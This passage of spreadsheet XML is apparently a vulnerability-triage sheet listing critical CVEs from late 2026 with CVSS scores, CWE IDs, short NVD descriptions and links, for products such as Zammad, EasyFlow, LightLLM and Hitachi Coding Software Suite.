      <c r="G17" s="5" t="inlineStr"/>
      <c r="H17" s="5" t="inlineStr"/>
      <c r="I17" s="5" t="inlineStr"/>
      <c r="J17" s="5" t="inlineStr"/>
      <c r="K17" s="5" t="inlineStr"/>
      <c r="L17" s="5" t="inlineStr"/>
      <c r="M17" s="5" t="inlineStr"/>
      <c r="N17" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O17" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P17" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q17" s="5" t="inlineStr"/>
      <c r="R17" s="5" t="inlineStr"/>
      <c r="S17" s="5" t="inlineStr">
        <is>
          <t>Zammad versions 6.3.0 to 6.5.4 are vulnerable a session hijack vulnerability that leads to remote code execution as the zammad user. The vulnerability is also present in version 7.0.0 to version 7.1.3, but not exploitable due to environment conditions.</t>
        </is>
      </c>
      <c r="T17" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102489</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C18" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102490</t>
        </is>
      </c>
      <c r="D18" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E18" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F18" s="5" t="inlineStr">
        <is>
          <t>csirt@divd.nl</t>
        </is>
      </c>
      <c r="G18" s="5" t="inlineStr"/>
      <c r="H18" s="5" t="inlineStr"/>
      <c r="I18" s="5" t="inlineStr"/>
      <c r="J18" s="5" t="inlineStr"/>
      <c r="K18" s="5" t="inlineStr"/>
      <c r="L18" s="5" t="inlineStr"/>
      <c r="M18" s="5" t="inlineStr"/>
      <c r="N18" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O18" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P18" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q18" s="5" t="inlineStr"/>
      <c r="R18" s="5" t="inlineStr"/>
      <c r="S18" s="5" t="inlineStr">
        <is>
          <t>All versions of Zammad including the latest alpha enable the local zammad user to escalate privileges to root.</t>
        </is>
      </c>
      <c r="T18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102490</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B19" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C19" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14157</t>
        </is>
      </c>
      <c r="D19" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E19" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F19" s="5" t="inlineStr">
        <is>
          <t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t>
        </is>
      </c>
      <c r="G19" s="5" t="inlineStr"/>
      <c r="H19" s="5" t="inlineStr"/>
      <c r="I19" s="5" t="inlineStr"/>
      <c r="J19" s="5" t="inlineStr"/>
      <c r="K19" s="5" t="inlineStr"/>
      <c r="L19" s="5" t="inlineStr"/>
      <c r="M19" s="5" t="inlineStr"/>
      <c r="N19" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O19" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P19" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q19" s="5" t="inlineStr"/>
      <c r="R19" s="5" t="inlineStr">
        <is>
          <t>CWE-134</t>
        </is>
      </c>
      <c r="S19" s="5" t="inlineStr">
        <is>
          <t>Use of an Externally Controlled Format String in the ASUS Router modules allow a remote authenticated user to execute arbitrary commands via a crafted file uploaded through the web management interface.</t>
        </is>
      </c>
      <c r="T19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14157</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B20" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C20" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55181</t>
        </is>
      </c>
      <c r="D20" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E20" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F20" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G20" s="5" t="inlineStr"/>
      <c r="H20" s="5" t="inlineStr"/>
      <c r="I20" s="5" t="inlineStr"/>
      <c r="J20" s="5" t="inlineStr">
        <is>
          <t>docker, gin</t>
        </is>
      </c>
      <c r="K20" s="5" t="inlineStr"/>
      <c r="L20" s="5" t="inlineStr"/>
      <c r="M20" s="5" t="inlineStr"/>
      <c r="N20" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O20" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P20" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q20" s="5" t="inlineStr"/>
      <c r="R20" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S20" s="5" t="inlineStr">
        <is>
          <t>Tugtainer is a self-hosted app for automating updates of Docker containers. Prior to version 1.30.3, Tugtainer's OIDC authentication can still be initiated even when OIDC_ENABLED=false. The /auth/oidc/enabled endpoint correctly reports that OIDC is disabled. However, a direct request to /auth/oidc/login still starts the OIDC login flow, returns HTTP 302, sets an oidc_state cookie, and redirects the user to the configured OIDC authorization endpoint. This bypasses the intended OIDC disable switch. This issue has been patched in version 1.30.3.</t>
        </is>
      </c>
      <c r="T20" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55181</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B21" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C21" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93903</t>
        </is>
      </c>
      <c r="D21" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E21" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F21" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G21" s="5" t="inlineStr"/>
      <c r="H21" s="5" t="inlineStr"/>
      <c r="I21" s="5" t="inlineStr"/>
      <c r="J21" s="5" t="inlineStr"/>
      <c r="K21" s="5" t="inlineStr"/>
      <c r="L21" s="5" t="inlineStr"/>
      <c r="M21" s="5" t="inlineStr"/>
      <c r="N21" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O21" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P21" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q21" s="5" t="inlineStr"/>
      <c r="R21" s="5" t="inlineStr">
        <is>
          <t>CWE-174</t>
        </is>
      </c>
      <c r="S21" s="5" t="inlineStr">
        <is>
          <t>LiteSpeed Web Server (LSWS) before 6.3.7 build 1 mishandles internal redirect URL validation in a certain "corner case."</t>
        </is>
      </c>
      <c r="T21" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93903</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B22" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C22" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102147</t>
        </is>
      </c>
      <c r="D22" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E22" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F22" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G22" s="5" t="inlineStr"/>
      <c r="H22" s="5" t="inlineStr"/>
      <c r="I22" s="5" t="inlineStr"/>
      <c r="J22" s="5" t="inlineStr"/>
      <c r="K22" s="5" t="inlineStr"/>
      <c r="L22" s="5" t="inlineStr"/>
      <c r="M22" s="5" t="inlineStr"/>
      <c r="N22" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O22" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P22" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q22" s="5" t="inlineStr"/>
      <c r="R22" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S22" s="5" t="inlineStr">
        <is>
          <t>A stored cross-site scripting (XSS) weakness in Kiteworks Core could allow an unauthenticated attacker to store crafted content that later executes arbitrary JavaScript in the authenticated session of an administrator who views the affected page. This could have permitted the attacker to gain full administrative control, including the creation of a new administrative account.</t>
        </is>
      </c>
      <c r="T22" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102147</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B23" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C23" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102455</t>
        </is>
      </c>
      <c r="D23" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E23" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F23" s="5" t="inlineStr">
        <is>
          <t>twcert@cert.org.tw</t>
        </is>
      </c>
      <c r="G23" s="5" t="inlineStr"/>
      <c r="H23" s="5" t="inlineStr"/>
      <c r="I23" s="5" t="inlineStr"/>
      <c r="J23" s="5" t="inlineStr"/>
      <c r="K23" s="5" t="inlineStr"/>
      <c r="L23" s="5" t="inlineStr"/>
      <c r="M23" s="5" t="inlineStr"/>
      <c r="N23" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O23" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P23" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q23" s="5" t="inlineStr"/>
      <c r="R23" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S23" s="5" t="inlineStr">
        <is>
          <t>EasyFlow .NET developed by Digiwin has a Insecure Deserialization vulnerability. Unauthenticated remote attackers can execute arbitrary code on the server by sending maliciously crafted serialized content.</t>
        </is>
      </c>
      <c r="T23" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102455</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B24" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C24" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102458</t>
        </is>
      </c>
      <c r="D24" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E24" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F24" s="5" t="inlineStr">
        <is>
          <t>twcert@cert.org.tw</t>
        </is>
      </c>
      <c r="G24" s="5" t="inlineStr"/>
      <c r="H24" s="5" t="inlineStr"/>
      <c r="I24" s="5" t="inlineStr"/>
      <c r="J24" s="5" t="inlineStr"/>
      <c r="K24" s="5" t="inlineStr"/>
      <c r="L24" s="5" t="inlineStr"/>
      <c r="M24" s="5" t="inlineStr"/>
      <c r="N24" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O24" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P24" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q24" s="5" t="inlineStr"/>
      <c r="R24" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S24" s="5" t="inlineStr">
        <is>
          <t>EasyFlow .NET developed by Digiwin has a Missing Authentication vulnerability. Unauthenticated remote attackers can obtain other users' plaintext passwords through a specific API.</t>
        </is>
      </c>
      <c r="T24" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102458</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B25" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C25" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103395</t>
        </is>
      </c>
      <c r="D25" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E25" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F25" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G25" s="5" t="inlineStr"/>
      <c r="H25" s="5" t="inlineStr"/>
      <c r="I25" s="5" t="inlineStr"/>
      <c r="J25" s="5" t="inlineStr"/>
      <c r="K25" s="5" t="inlineStr"/>
      <c r="L25" s="5" t="inlineStr"/>
      <c r="M25" s="5" t="inlineStr"/>
      <c r="N25" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O25" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P25" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q25" s="5" t="inlineStr"/>
      <c r="R25" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S25" s="5" t="inlineStr">
        <is>
          <t>LightLLM through 1.2.0 visual_only deployments expose an unauthenticated RPyC service with allow_pickle enabled that deserializes attacker-supplied arguments in the remote_infer_images method. Attackers can reach the visual RPyC port and pass objects with __reduce__ methods to execute arbitrary code with service account privileges.</t>
        </is>
      </c>
      <c r="T25" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103395</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B26" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C26" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103470</t>
        </is>
      </c>
      <c r="D26" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E26" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F26" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G26" s="5" t="inlineStr"/>
      <c r="H26" s="5" t="inlineStr"/>
      <c r="I26" s="5" t="inlineStr"/>
      <c r="J26" s="5" t="inlineStr"/>
      <c r="K26" s="5" t="inlineStr"/>
      <c r="L26" s="5" t="inlineStr"/>
      <c r="M26" s="5" t="inlineStr"/>
      <c r="N26" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O26" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P26" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q26" s="5" t="inlineStr"/>
      <c r="R26" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="S26" s="5" t="inlineStr">
        <is>
          <t>In Internet2 Grouper before 7.5.1 (in some configurations), a user who is allowed to create or edit rules in the User Interface can escalate privileges.</t>
        </is>
      </c>
      <c r="T26" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103470</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B27" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C27" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103475</t>
        </is>
      </c>
      <c r="D27" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E27" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F27" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G27" s="5" t="inlineStr"/>
      <c r="H27" s="5" t="inlineStr"/>
      <c r="I27" s="5" t="inlineStr"/>
      <c r="J27" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K27" s="5" t="inlineStr"/>
      <c r="L27" s="5" t="inlineStr"/>
      <c r="M27" s="5" t="inlineStr"/>
      <c r="N27" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O27" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P27" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q27" s="5" t="inlineStr"/>
      <c r="R27" s="5" t="inlineStr">
        <is>
          <t>CWE-489</t>
        </is>
      </c>
      <c r="S27" s="5" t="inlineStr">
        <is>
          <t>yii2-starter-kit through 4.2.0 exposes the Yii debug and Gii modules to all IP addresses by setting allowedIPs to ['*'] in its default development configuration. Unauthenticated remote attackers can access the debug endpoint to read sensitive data including session cookies and database queries, or access the Gii endpoint to generate and write PHP files into the application directory.</t>
        </is>
      </c>
      <c r="T27" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103475</t>
        </is>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B28" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C28" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74864</t>
        </is>
      </c>
      <c r="D28" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E28" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F28" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G28" s="5" t="inlineStr"/>
      <c r="H28" s="5" t="inlineStr"/>
      <c r="I28" s="5" t="inlineStr"/>
      <c r="J28" s="5" t="inlineStr">
        <is>
          <t>nginx, go, gin</t>
        </is>
      </c>
      <c r="K28" s="5" t="inlineStr"/>
      <c r="L28" s="5" t="inlineStr"/>
      <c r="M28" s="5" t="inlineStr"/>
      <c r="N28" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O28" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P28" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q28" s="5" t="inlineStr"/>
      <c r="R28" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S28" s="5" t="inlineStr">
        <is>
          <t>sogo_yhn configures SOGo with a parameter that forces the request with HTTP header "x-webobjects-remote-user" to be treated as sent by a verified user without performing password validation. Since Nginx does not strip this header, any client can supply it arbitrarily and gain access as any user, including a privileged user, without providing a password.
This issue was fixed in version 5.8.0~ynh9.</t>
        </is>
      </c>
      <c r="T28" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74864</t>
        </is>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B29" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C29" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76142</t>
        </is>
      </c>
      <c r="D29" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E29" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F29" s="5" t="inlineStr">
        <is>
          <t>vuln@krcert.or.kr</t>
        </is>
      </c>
      <c r="G29" s="5" t="inlineStr"/>
      <c r="H29" s="5" t="inlineStr"/>
      <c r="I29" s="5" t="inlineStr"/>
      <c r="J29" s="5" t="inlineStr"/>
      <c r="K29" s="5" t="inlineStr"/>
      <c r="L29" s="5" t="inlineStr"/>
      <c r="M29" s="5" t="inlineStr"/>
      <c r="N29" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O29" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P29" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q29" s="5" t="inlineStr"/>
      <c r="R29" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-306</t>
        </is>
      </c>
      <c r="S29" s="5" t="inlineStr">
        <is>
          <t>Insufficient authentication and access control on the internal-only IPC SOAP endpoint of the Genian NAC/ZTNA policy server allows an unauthenticated attacker to invoke internal functions</t>
        </is>
      </c>
      <c r="T29" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76142</t>
        </is>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B30" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C30" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82824</t>
        </is>
      </c>
      <c r="D30" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E30" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F30" s="5" t="inlineStr">
        <is>
          <t>hirt@hitachi.co.jp</t>
        </is>
      </c>
      <c r="G30" s="5" t="inlineStr"/>
      <c r="H30" s="5" t="inlineStr"/>
      <c r="I30" s="5" t="inlineStr"/>
      <c r="J30" s="5" t="inlineStr"/>
      <c r="K30" s="5" t="inlineStr"/>
      <c r="L30" s="5" t="inlineStr"/>
      <c r="M30" s="5" t="inlineStr"/>
      <c r="N30" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O30" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P30" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q30" s="5" t="inlineStr"/>
      <c r="R30" s="5" t="inlineStr">
        <is>
          <t>CWE-35</t>
        </is>
      </c>
      <c r="S30" s="5" t="inlineStr">
        <is>
          <t>Hitachi Coding Software Suite contains a vulnerability related to Path Traversal vulnerability that allows an attacker to access, create, modify, or delete files.
This issue affects Hitachi Coding Software Suite: through 3.3.0.</t>
        </is>
      </c>
      <c r="T30" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82824</t>
        </is>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B31" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C31" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82825</t>
        </is>
      </c>
      <c r="D31" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E31" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F31" s="5" t="inlineStr">
        <is>
          <t>hirt@hitachi.co.jp</t>
        </is>
      </c>
      <c r="G31" s="5" t="inlineStr"/>
      <c r="H31" s="5" t="inlineStr"/>
      <c r="I31" s="5" t="inlineStr"/>
      <c r="J31" s="5" t="inlineStr"/>
      <c r="K31" s="5" t="inlineStr"/>
      <c r="L31" s="5" t="inlineStr"/>
      <c r="M31" s="5" t="inlineStr"/>
      <c r="N31" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O31" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P31" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q31" s="5" t="inlineStr"/>
      <c r="R31" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S31" s="5" t="inlineStr">
        <is>
          <t>Hitachi Coding Software Suite contains a vulnerability related to Missing Authentication for Critical Function. This allows an unauthenticated attacker to invoke a critical API, potentially leading to unauthorized retrieval or alteration of sensitive information, or unauthorized manipulation.
This issue affects Hitachi Coding Software Suite: through 3.3.0.</t>
        </is>
      </c>
      <c r="T31" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82825</t>
        </is>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B32" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C32" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82827</t>
        </is>
      </c>
      <c r="D32" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E32" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F32" s="5" t="inlineStr">
        <is>
          <t>hirt@hitachi.co.jp</t>
        </is>
      </c>
      <c r="G32" s="5" t="inlineStr"/>
      <c r="H32" s="5" t="inlineStr"/>
      <c r="I32" s="5" t="inlineStr"/>
      <c r="J32" s="5" t="inlineStr"/>
      <c r="K32" s="5" t="inlineStr"/>
      <c r="L32" s="5" t="inlineStr"/>
      <c r="M32" s="5" t="inlineStr"/>
      <c r="N32" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O32" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P32" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q32" s="5" t="inlineStr"/>
      <c r="R32" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="S32" s="5" t="inlineStr">
        <is>
          <t>Hitachi Coding Software Suite contains a vulnerability related to Use of Hard-coded Cryptographic Key. The Hardcoding of JWT signing secret key allows an attacker to generate unauthorized Bearer tokens and exploit administrative functions.
This issue affects Hitachi Coding Software Suite: through 3.3.0.</t>
        </is>
      </c>
      <c r="T32" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82827</t>
        </is>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B33" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C33" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82829</t>
        </is>
      </c>
      <c r="D33" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E33" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F33" s="5" t="inlineStr">
        <is>
          <t>hirt@hitachi.co.jp</t>
        </is>
      </c>
      <c r="G33" s="5" t="inlineStr"/>
      <c r="H33" s="5" t="inlineStr"/>
      <c r="I33" s="5" t="inlineStr"/>
      <c r="J33" s="5" t="inlineStr"/>
      <c r="K33" s="5" t="inlineStr"/>
      <c r="L33" s="5" t="inlineStr"/>
      <c r="M33" s="5" t="inlineStr"/>
      <c r="N33" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O33" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P33" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q33" s="5" t="inlineStr"/>
      <c r="R33" s="5" t="inlineStr">
        <is>
          <t>CWE-912</t>
        </is>
      </c>
      <c r="S33" s="5" t="inlineStr">
        <is>
          <t>Hitachi Coding Software Suite contains a vulnerability related to Hidden Functionality vulnerability which allows an attacker to gain unauthorized access by exploiting hidden accounts or hard coded credentials.
This issue affects Hitachi Coding Software Suite: through 3.3.0.</t>
        </is>
      </c>
      <c r="T33" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82829</t>
        </is>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
